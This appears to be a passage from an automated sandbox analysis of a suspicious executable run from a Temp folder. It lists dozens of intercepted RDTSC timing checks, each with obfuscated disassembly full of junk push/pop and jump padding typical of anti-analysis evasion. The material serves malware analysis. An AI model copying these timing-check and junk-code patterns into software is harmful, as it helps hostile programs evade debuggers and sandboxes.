Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C37 second address: 4C10C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ch, 3Eh 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edx, esi 0x00000016 push eax 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C50 second address: 4C10C58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1074E second address: 4C1075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1075F second address: 4C1077D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1077D second address: 4C10781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10781 second address: 4C10787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10787 second address: 4C107A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 539FBC27h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edi, 2B5E5ECAh 0x00000014 movsx ebx, si 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107A5 second address: 4C107AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107AB second address: 4C107B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107B0 second address: 4C107B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107B6 second address: 4C107BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1068E second address: 4C106A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C106A6 second address: 4C106AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C106AA second address: 4C106E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ah, DFh 0x0000000c mov edx, 647F6A3Ah 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F742CEB81CAh 0x0000001e jmp 00007F742CEB81D5h 0x00000023 popfd 0x00000024 push ecx 0x00000025 pop ebx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C106E6 second address: 4C106EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1040B second address: 4C10412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10412 second address: 4C1042F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007F742CC4420Eh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov al, CEh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1042F second address: 4C1049E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F742CEB81D9h 0x00000008 and cl, FFFFFFB6h 0x0000000b jmp 00007F742CEB81D1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov bx, si 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F742CEB81CAh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F742CEB81CDh 0x00000028 and cx, FCC6h 0x0000002d jmp 00007F742CEB81D1h 0x00000032 popfd 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C2026F second address: 4C20273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C20273 second address: 4C20279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C20279 second address: 4C20310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5679C96Fh 0x00000008 pushfd 0x00000009 jmp 00007F742CC44214h 0x0000000e or ax, A198h 0x00000013 jmp 00007F742CC4420Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F742CC44216h 0x00000022 push eax 0x00000023 jmp 00007F742CC4420Bh 0x00000028 xchg eax, ebp 0x00000029 jmp 00007F742CC44216h 0x0000002e mov ebp, esp 0x00000030 jmp 00007F742CC44210h 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F742CC44217h 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F1E second address: 4C50F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F24 second address: 4C50F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F3D second address: 4C50F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F41 second address: 4C50F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F47 second address: 4C50F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F4D second address: 4C50F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F51 second address: 4C50F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C303D1 second address: 4C303D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C303D7 second address: 4C303DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C303DD second address: 4C30430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44218h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov edx, esi 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 and dword ptr [eax], 00000000h 0x00000018 jmp 00007F742CC44215h 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F742CC4420Dh 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C105E9 second address: 4C105EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C105EF second address: 4C105F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C30016 second address: 4C3001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3001C second address: 4C30020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C30020 second address: 4C3003E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov eax, 0B2FE47Bh 0x0000000f mov esi, 0BCE4D57h 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, D1h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3003E second address: 4C3005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44218h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C30224 second address: 4C3027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F742CEB81D2h 0x00000009 jmp 00007F742CEB81D5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov esi, 4FC46A23h 0x0000001a push esi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F742CEB81D7h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3027A second address: 4C3027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C5069A second address: 4C506DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6CCDE79Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F742CEB81D7h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F742CEB81D6h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c movzx ecx, di 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C506DC second address: 4C50714 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007F742CC44210h 0x0000000d and ecx, 3BDEE098h 0x00000013 jmp 00007F742CC4420Bh 0x00000018 popfd 0x00000019 pop eax 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dh, F0h 0x00000021 mov esi, 31BA8299h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50714 second address: 4C507A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f mov eax, 24AA2E27h 0x00000014 popad 0x00000015 mov eax, dword ptr [774365FCh] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F742CEB81D8h 0x00000021 or cx, 5488h 0x00000026 jmp 00007F742CEB81CBh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F742CEB81D8h 0x00000032 and eax, 43B6B6E8h 0x00000038 jmp 00007F742CEB81CBh 0x0000003d popfd 0x0000003e popad 0x0000003f test eax, eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F742CEB81D5h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507A8 second address: 4C507D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F749F3A73AFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F742CC4420Dh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507D2 second address: 4C507D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507D8 second address: 4C507DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507DC second address: 4C50834 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b mov di, 2ED8h 0x0000000f pushfd 0x00000010 jmp 00007F742CEB81D1h 0x00000015 jmp 00007F742CEB81CBh 0x0000001a popfd 0x0000001b popad 0x0000001c xor eax, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov esi, 6A177C77h 0x00000027 pushfd 0x00000028 jmp 00007F742CEB81CCh 0x0000002d or cx, 2068h 0x00000032 jmp 00007F742CEB81CBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50834 second address: 4C5084C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44214h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C5084C second address: 4C50850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50850 second address: 4C50867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F742CC4420Ah 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50867 second address: 4C508BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F742CEB81D1h 0x00000009 and si, 33E6h 0x0000000e jmp 00007F742CEB81D1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F742CEB81D0h 0x0000001a xor ah, FFFFFF88h 0x0000001d jmp 00007F742CEB81CBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 ror eax, cl 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C508BD second address: 4C508C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C508C4 second address: 4C508DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C508DE second address: 4C509A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F742CC44216h 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [002B0014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007F743162537Fh 0x0000002c push FFFFFFFEh 0x0000002e jmp 00007F742CC44210h 0x00000033 pop eax 0x00000034 jmp 00007F742CC44210h 0x00000039 ret 0x0000003a nop 0x0000003b push eax 0x0000003c call 00007F743162539Ch 0x00000041 mov edi, edi 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F742CC4420Eh 0x0000004a and ax, 5108h 0x0000004f jmp 00007F742CC4420Bh 0x00000054 popfd 0x00000055 pushad 0x00000056 mov ecx, 29BF3395h 0x0000005b pushfd 0x0000005c jmp 00007F742CC44212h 0x00000061 adc ax, F368h 0x00000066 jmp 00007F742CC4420Bh 0x0000006b popfd 0x0000006c popad 0x0000006d popad 0x0000006e xchg eax, ebp 0x0000006f jmp 00007F742CC44216h 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F742CC4420Eh 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509A4 second address: 4C509A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509A9 second address: 4C509DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F742CC44212h 0x00000015 sub al, 00000058h 0x00000018 jmp 00007F742CC4420Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509DB second address: 4C509E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 24351E7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C509E5 second address: 4C50A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007F742CC44217h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50A0C second address: 4C50A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C000E5 second address: 4C000E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C000E9 second address: 4C000EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C000EF second address: 4C001CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007F742CC44210h 0x00000011 xchg eax, ecx 0x00000012 jmp 00007F742CC44210h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov edx, 31549EA4h 0x0000001e mov dx, 0110h 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov edi, 7349E228h 0x0000002a pushfd 0x0000002b jmp 00007F742CC44211h 0x00000030 xor ch, FFFFFF96h 0x00000033 jmp 00007F742CC44211h 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ebx 0x0000003b jmp 00007F742CC4420Eh 0x00000040 push eax 0x00000041 jmp 00007F742CC4420Bh 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 call 00007F742CC44214h 0x0000004d mov ecx, 020B2C71h 0x00000052 pop ecx 0x00000053 jmp 00007F742CC44217h 0x00000058 popad 0x00000059 mov ebx, dword ptr [ebp+10h] 0x0000005c pushad 0x0000005d mov esi, 474621DBh 0x00000062 call 00007F742CC44210h 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C001CA second address: 4C001E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F742CEB81D3h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C001E6 second address: 4C0020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0020C second address: 4C00210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00210 second address: 4C00216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00216 second address: 4C0022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0022B second address: 4C0022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0022F second address: 4C00240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00240 second address: 4C002FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov ecx, 325CF999h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f mov cx, 42D1h 0x00000013 mov ebx, ecx 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 call 00007F742CC44214h 0x0000001d mov si, 7DB1h 0x00000021 pop ecx 0x00000022 popad 0x00000023 xchg eax, edi 0x00000024 jmp 00007F742CC4420Dh 0x00000029 test esi, esi 0x0000002b jmp 00007F742CC4420Eh 0x00000030 je 00007F749F3F258Bh 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F742CC4420Eh 0x0000003d sub ax, C9E8h 0x00000042 jmp 00007F742CC4420Bh 0x00000047 popfd 0x00000048 pushfd 0x00000049 jmp 00007F742CC44218h 0x0000004e add ecx, 09445C48h 0x00000054 jmp 00007F742CC4420Bh 0x00000059 popfd 0x0000005a popad 0x0000005b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F742CC44210h 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C002FE second address: 4C0030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
